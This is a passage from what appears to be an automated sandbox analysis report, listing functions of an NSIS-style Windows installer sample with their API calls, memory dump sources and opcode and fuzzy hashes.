                                                                • RegCloseKey.KERNELBASE(?,?,004063C6,80000002,Software\Microsoft\Windows\CurrentVersion,: Completed,: Completed,: Completed,00000000,Completed), ref: 004061A3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: CloseQueryValue
                                                                • String ID: : Completed
                                                                • API String ID: 3356406503-2954849223
                                                                • Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                • Instruction ID: bbbd3ef8f6d6f34ea5303db1c751cd258066777a1c36f61d7f193cbbff11b307
                                                                • Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                • Instruction Fuzzy Hash: B701BC32510209EBDF21CF50CD09EDF3BA8EB04360F01803AFD06A6191D738DA68CBA4
                                                                Function 0040586D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004266F0,Error launching installer), ref: 00405896
                                                                • CloseHandle.KERNEL32(?), ref: 004058A3
                                                                Strings
                                                                • Error launching installer, xrefs: 00405880
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: CloseCreateHandleProcess
                                                                • String ID: Error launching installer
                                                                • API String ID: 3712363035-66219284
                                                                • Opcode ID: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
                                                                • Instruction ID: 38a1dae354cb2a4c5fc32891eb37452fbeb174cf60b6e0268020382365bb363f
                                                                • Opcode Fuzzy Hash: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
                                                                • Instruction Fuzzy Hash: FFE0BFB560020ABFFB10AF64ED05F7B7AACFB14704F414535BD51F2150D7B898158A78
                                                                Function 00406DC3 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2379a6b80c2bc0c9d89d3ff48ecf146a73f88eb31b703b146685e5d0c657cb03
                                                                • Instruction ID: 28e39518df3801c38e3280a2e83f64e055c3b15caa2ea9a1a3761292ca1e3da9
                                                                • Opcode Fuzzy Hash: 2379a6b80c2bc0c9d89d3ff48ecf146a73f88eb31b703b146685e5d0c657cb03
                                                                • Instruction Fuzzy Hash: F9A15371E04229CBDB28CFA8C8547ADBBB1FF44305F10816ED456BB281C7786A86DF45
                                                                Function 00406FC4 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a97e96a70b1528884494d5a2455c9c9c8bf64013d0c9d0d58a0b179d1d34f865
                                                                • Instruction ID: 90999bc76b255a60827136b2fd47affe8781ac3d45706895e3c6f95813f0c94e
                                                                • Opcode Fuzzy Hash: a97e96a70b1528884494d5a2455c9c9c8bf64013d0c9d0d58a0b179d1d34f865
                                                                • Instruction Fuzzy Hash: 21913F71D04229CBDB28CF98C8547ADBBB1FF44305F14816ED456BB291C378AA86DF45
                                                                Function 00406CDA Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 526acb6b229722c101271a282f82fa7e8491aea9f4c983caca1afef0c2905762
                                                                • Instruction ID: 7ab5a6fdb7118453f5bc4abdeeb58a7f0a93ca16cb9ae78d5f3cb9c6a39904d0
                                                                • Opcode Fuzzy Hash: 526acb6b229722c101271a282f82fa7e8491aea9f4c983caca1afef0c2905762
                                                                • Instruction Fuzzy Hash: 8E814471E04229DBDF24CFA8C8447ADBBB1FF44301F24816AD456BB291C778AA86DF15
                                                                Function 004067DF Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d01b1c5effafd64d8cfad2db312f22eb5162b5418c1bb992621b7de497566ec4
                                                                • Instruction ID: 21cf7db9f51931c48f99e7e9547f5b24ff728e46d141457ef608e09f17fb8729
                                                                • Opcode Fuzzy Hash: d01b1c5effafd64d8cfad2db312f22eb5162b5418c1bb992621b7de497566ec4
                                                                • Instruction Fuzzy Hash: 4C815571D04229DBDB24CFA9D8447ADBBB0FB44301F2081AEE456BB281C7786A86DF55
                                                                Function 00406C2D Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 133937f1df7ceb29c30f38c33f45990f246052236d4704b56955204b6cd885fa
                                                                • Instruction ID: dacb8e277fcbb3a33cac5efaa2c5173e23fd2fcd6bf81bdfe6f06a7534410a90
                                                                • Opcode Fuzzy Hash: 133937f1df7ceb29c30f38c33f45990f246052236d4704b56955204b6cd885fa
                                                                • Instruction Fuzzy Hash: 6C714371E04229CBDF24CF98C8447ADBBB1FF44305F14806AD446BB281C738AA86DF04
                                                                Function 00406D4B Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0a10928d7685989459388dead70c60bd1e808e0421cae42356cd2ce25e8ee986
                                                                • Instruction ID: 610106becc8cf73b6091924598cab7a4a25495cbbf2bb893dbe28c15679d0a85
                                                                • Opcode Fuzzy Hash: 0a10928d7685989459388dead70c60bd1e808e0421cae42356cd2ce25e8ee986
                                                                • Instruction Fuzzy Hash: 5C714271E04229CBDB28CF98C844BADBBB1FF44301F14816AD456BB291C738A986DF45
                                                                Function 00406C97 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 11d0e2bf2ab0c12615b3c88e0718215a3c217c66979ab711a777e3af05fd446c
                                                                • Instruction ID: 65b73de0ce6de3c7b1653dbcc26eb67f08ce95b734c4b9eb4028e98c7b5a0113
                                                                • Opcode Fuzzy Hash: 11d0e2bf2ab0c12615b3c88e0718215a3c217c66979ab711a777e3af05fd446c
                                                                • Instruction Fuzzy Hash: 0B714371E04229DBEF28CF98C8447ADBBB1FF44305F11806AD456BB291C738AA96DF45
                                                                Function 00401B77 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GlobalFree.KERNEL32(00000000), ref: 00401BE7
                                                                • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BF9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: Global$AllocFree
                                                                • String ID: Polystichoid
                                                                • API String ID: 3394109436-2603710711
                                                                • Opcode ID: ee5f3472336f38c8d4c732810d3d94e3c99b64600326e0d47cef6cb5722a8e46
                                                                • Instruction ID: c71429250c0cafa7b5cd6a02bb6544c1a7146a0c31e36a2bf00ca42990a6d084
                                                                • Opcode Fuzzy Hash: ee5f3472336f38c8d4c732810d3d94e3c99b64600326e0d47cef6cb5722a8e46
                                                                • Instruction Fuzzy Hash: 6E215472600141EBDB20FB94CE8595A73A4AB44318729057FF502B32D1DBB8A8919BAD
                                                                Function 00401F8C Relevance: 3.1, APIs: 2, Instructions: 63memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0040665E: GetModuleHandleA.KERNEL32(?,00000020,?,004033CB,0000000A), ref: 00406670
                                                                  • Part of subcall function 0040665E: GetProcAddress.KERNEL32(00000000,?), ref: 0040668B
                                                                • GetFileVersionInfoSizeW.KERNELBASE(00000009,00000000,?,000000EE), ref: 00401FA2
                                                                • GlobalAlloc.KERNEL32(00000040,00000000), ref: 00401FC1
                                                                  • Part of subcall function 004061CB: wsprintfW.USER32 ref: 004061D8
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: AddressAllocFileGlobalHandleInfoModuleProcSizeVersionwsprintf
                                                                • String ID:
                                                                • API String ID: 2520467145-0
                                                                • Opcode ID: a34a477b57b6b6384716236360418187d5a5464880f4ccde9889f209724b805d
                                                                • Instruction ID: 280eb5e8334f411f39d8c2fef6e633d2853c014e7ace8d4ea398df577ea4e561
                                                                • Opcode Fuzzy Hash: a34a477b57b6b6384716236360418187d5a5464880f4ccde9889f209724b805d
                                                                • Instruction Fuzzy Hash: A7114A71A00208BFDB01AFA5DD89E9EBBB5EF44314F11402AF505F62A1EB768951DB28
                                                                Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: MessageSend
                                                                • String ID:
                                                                • API String ID: 3850602802-0
                                                                • Opcode ID: 4f6c34c5b8a695bbd53b5e5fd0d5779018604e626f19c7de5a7ff9245b1439a4
                                                                • Instruction ID: 643084589b99c3aa520b22feaac895240b719bdb66a029b0c5212504e21fbf59
                                                                • Opcode Fuzzy Hash: 4f6c34c5b8a695bbd53b5e5fd0d5779018604e626f19c7de5a7ff9245b1439a4
                                                                • Instruction Fuzzy Hash: 7A01F4317242119BEB195B799D09B3A3798E710314F14463FF855F62F1DA78CC529B4C
                                                                Function 0040238E Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023B0
                                                                • RegCloseKey.ADVAPI32(00000000), ref: 004023B9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: CloseDeleteValue
                                                                • String ID:
                                                                • API String ID: 2831762973-0
                                                                • Opcode ID: 872768f9574d12f43afb320518d05b11b882bfe6f7cb57a839f181c8ca2a28db
                                                                • Instruction ID: c64e159aaddbf3301d14cafd97046592125c01172a1cc8aad3b5dad300b5ea2c
                                                                • Opcode Fuzzy Hash: 872768f9574d12f43afb320518d05b11b882bfe6f7cb57a839f181c8ca2a28db
                                                                • Instruction Fuzzy Hash: 2FF0FC32E041109BE700BBA49B8DABE72A49B44314F25003FFE02F31C1C9F84D41576D
                                                                Function 00401573 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: ShowWindow
                                                                • String ID:
                                                                • API String ID: 1268545403-0
